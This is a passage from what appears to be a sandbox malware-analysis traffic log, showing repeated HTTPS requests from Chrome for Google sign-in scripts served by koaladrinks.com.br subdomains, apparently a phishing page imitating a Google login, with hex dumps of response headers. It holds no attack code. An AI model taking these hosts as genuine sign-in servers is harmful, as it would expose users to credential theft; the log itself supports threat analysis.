                                                      2025-01-10 08:27:45 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:45 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:45 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:45 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 37 3a 34 39 3a 33 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 07:49:32 GMT
                                                      2025-01-10 08:27:45 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 37 3a 34 39 3a 33 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 07:49:32 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.949754139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:44 UTC1972OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:45 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:45 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:45 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:45 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:45 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:45 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:45 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:45 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:45 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:45 GMT
                                                      2025-01-10 08:27:45 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:27:45 GMT
                                                      2025-01-10 08:27:45 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 35 39 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Last-Modified: Fri, 03 Jan 2025 23:59:22 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.949753139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:44 UTC1979OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZ [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:45 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:45 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:45 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:45 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:45 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:45 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:45 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:45 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:45 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:45 GMT
                                                      2025-01-10 08:27:45 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:27:45 GMT
                                                      2025-01-10 08:27:45 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 35 39 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Last-Modified: Fri, 03 Jan 2025 23:59:22 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.949755139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:45 UTC2047OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddg [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:46 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:46 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:46 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:46 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:46 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:46 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:46 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:46 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:46 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:45 GMT
                                                      2025-01-10 08:27:46 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:27:45 GMT
                                                      2025-01-10 08:27:46 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 35 39 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Last-Modified: Fri, 03 Jan 2025 23:59:22 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.949750139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:45 UTC652OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHib1bm8jnmMUUG53bjMxb43esJQQ/m=_b,_tp HTTP/1.1
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:46 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:46 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:46 UTC12INData Raw: 41 67 65 3a 20 39 34 36 38 31 0d 0a
                                                      Data Ascii: Age: 94681
                                                      2025-01-10 08:27:46 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:46 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:46 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:46 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:46 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:46 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:46 UTC37INData Raw: 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 30 39 3a 34 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Thu, 09 Jan 2025 06:09:44 GMT
                                                      2025-01-10 08:27:46 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 30 39 20 4a 61 6e 20 32 30 32 36 20 30 36 3a 30 39 3a 34 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Fri, 09 Jan 2026 06:09:44 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.949751139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:45 UTC1493OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:46 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:46 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:46 UTC10INData Raw: 41 67 65 3a 20 33 37 38 0d 0a
                                                      Data Ascii: Age: 378
